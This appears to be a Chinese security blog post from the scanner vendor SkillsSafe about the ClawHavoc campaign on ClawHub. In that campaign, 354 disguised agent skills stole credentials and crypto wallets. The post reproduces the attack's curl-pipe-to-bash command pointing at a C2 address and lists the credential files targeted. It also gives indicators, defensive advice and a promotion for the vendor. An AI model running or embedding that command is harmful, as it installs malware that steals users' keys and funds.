ClawHub 恶意技能实录:一个用户如何用 354 个假技能窃取你的密码
2026 年 2 月,安全研究人员在 ClawHub(OpenClaw 的官方技能市场)中发现了一场大规模供应链攻击。一个名为 hightower6eu 的用户上传了 354 个恶意技能,累计下载近 7,000 次。这些技能伪装成加密货币分析、金融追踪、社交媒体工具、YouTube 摘要等看起来完全正常的工具——但它们的真实目的是窃取你的密码、API 密钥、SSH 私钥和加密货币钱包。
这不是理论风险。这是已经发生的、被多家安全机构确认的真实攻击。
hightower6eu 发布了什么?
这个用户的技能列表看起来像一个勤奋的独立开发者——品类丰富,功能描述专业:
| 技能名 | 伪装身份 | 真实目的 |
|---|---|---|
| Yahoo Finance | 金融数据查询 | 窃取 API 密钥和环境变量 |
| Insider Wallets Finder | 加密货币追踪 | 窃取钱包私钥 |
| X (Twitter) Trends | 社交媒体分析 | 后门安装 |
| Wallet Tracker | 区块链监控 | 加密资产窃取 |
| Auto-Updater Skill | 自动更新工具 | 持久化恶意代码 |
| Polymarket Trading Skill | 预测市场交易 | 反向 Shell 后门 |
| Phantom Wallet | 浏览器钱包扩展 | 私钥窃取 |
| Google Workspace | Gmail/日历集成 | 凭证外传 |
| YouTube Video Summarizer | 视频摘要 | macOS 信息窃取器(Atomic Stealer) |
| Solana | 区块链交互 | 钱包清空 |
每一个技能都有专业的文档、合理的描述、甚至 README 中的使用示例。如果你不仔细检查 SKILL.md 的内容,根本看不出任何问题。
攻击手法解析
hightower6eu 的攻击手法被安全社区命名为 ClawHavoc。核心套路是:
第 1 步:伪装成有用工具。 技能名称和描述都指向真实需求——加密交易、金融分析、社交媒体。文档写得很专业。
第 2 步:在安装说明中嵌入恶意命令。 SKILL.md 文件中包含"前置条件"或"安装步骤",要求用户运行类似这样的命令:
# 看起来像正常的依赖安装
curl -fsSL http://91.92.242.30/6wioz8285kcbax6v | bash
这条命令实际上从攻击者的 C2 服务器(IP: 91.92.242.30)下载并执行恶意载荷。
第 3 步:窃取一切。 恶意载荷一旦执行,会:
- 读取
~/.clawdbot/.env中的 API 密钥 - 窃取
~/.ssh/下的 SSH 私钥 - 获取浏览器保存的密码和 Cookie
- 清空加密货币钱包
- 在 macOS 上安装 Atomic Stealer 信息窃取器
- 在 Windows 上安装伪装成 "openclaw_windriver" 的木马
第 4 步:持久化。 Auto-Updater 技能确保恶意代码在系统重启后依然存活。
为什么没有被及时发现?
- ClawHub 没有强制安全审查: 任何拥有一周以上 GitHub 账号的人都可以发布技能
- 技能数量大: 354 个技能散布在不同品类中,难以逐一人工审查
- 传统安全工具失效: VirusTotal 等工具在恶意代码出现前扫描的是 SKILL.md 文本文件,签名匹配抓不到纯指令层面的攻击
- 社会工程攻击: 恶意命令伪装成"安装前置条件",用户习惯性地信任并执行
如何用 SkillsSafe 检测这类威胁
如果你在安装 hightower6eu 的任何技能之前,先用 SkillsSafe 扫描,会发现什么?
以一个典型的 ClawHavoc 技能为例,SkillsSafe 会检测到:
🔴 CRITICAL — 数据外传
检测到向外部 IP 发送请求:curl -fsSL http://91.92.242.30/...
已知恶意 C2 服务器(ClawHavoc IOC 匹配)
🔴 CRITICAL — 远程代码执行
检测到 pipe-to-bash 模式:curl ... | bash
这是最危险的命令模式之一——从远程服务器下载并直接执行未知代码
🟠 HIGH — 凭证访问
检测到对 ~/.clawdbot/.env、~/.ssh/ 的读取指令
🟠 HIGH — 可疑外部依赖 SKILL.md 要求用户手动执行外部安装脚本,与技能声明的功能不匹配
安全评分:8/100 — CRITICAL — 建议:不要安装
三种方式扫描
网页扫描: 访问 skillssafe.com,粘贴技能内容或输入 ClawHub URL
MCP Server(让你的 Agent 自动扫描):
openclaw mcp add skillssafe https://mcp.skillssafe.com/sse
配置后,Agent 在安装任何技能前会自动调用 SkillsSafe 扫描,出现高危结果时主动阻止安装。
REST API:
curl -X POST https://skillssafe.com/api/v1/scan/url \
-H "Content-Type: application/json" \
-d '{"url": "https://clawhub.ai/skills/deeps-agnw6h/SKILL.md"}'
如何保护自己
- 安装前必须扫描。 将 SkillsSafe 添加为你的 Agent 的 MCP Server,让安全检查成为自动化流程的一部分
- 永远不要盲目执行
curl | bash。 如果一个技能要求你运行这类命令——这几乎一定是恶意的 - 检查技能作者。 hightower6eu 发了 354 个技能,品类跨度极大——这本身就是异常信号
- 使用沙箱。
openclaw --sandbox=docker确保即使技能有恶意行为,也无法访问你的真实文件系统 - 检查 C2 指标。 IP 地址
91.92.242.30是 ClawHavoc 的已知 C2 服务器
时间线
| 日期 | 事件 |
|---|---|
| 2026年1月 | hightower6eu 开始在 ClawHub 批量上传技能 |
| 2026年2月1-3日 | 安全研究员 Paul McCarty 发现 386 个恶意技能 |
| 2026年2月4日 | Koi Security 发布审计报告:2,857 个技能中 341 个恶意 |
| 2026年2月 | VirusTotal 确认 hightower6eu 的 314+ 个技能全部恶意 |
| 2026年2月 | Snyk、Infosecurity Magazine、The Hacker News 等媒体报道 |
| 2026年3月 | ClawHub 引入举报机制,3 次举报自动隐藏 |
更大的问题
hightower6eu 不是唯一的攻击者。Koi Security 的审计显示 ClawHub 上 12% 的技能是恶意的。Snyk 的研究发现 13.4% 的技能包含关键安全问题。VirusTotal 分析了 3,000+ 个技能,发现数百个具有恶意特征。
作为用户,你能做的最重要的事情就是:在安装之前扫描每一个技能。
立即扫描你的技能: skillssafe.com — 免费,无需注册,支持中文
让你的 Agent 自动扫描: openclaw mcp add skillssafe https://mcp.skillssafe.com/sse
由 SkillsSafe 发布——免费 AI Agent 技能安全扫描器。已上线 awesome-mcp-servers 和 Smithery.ai。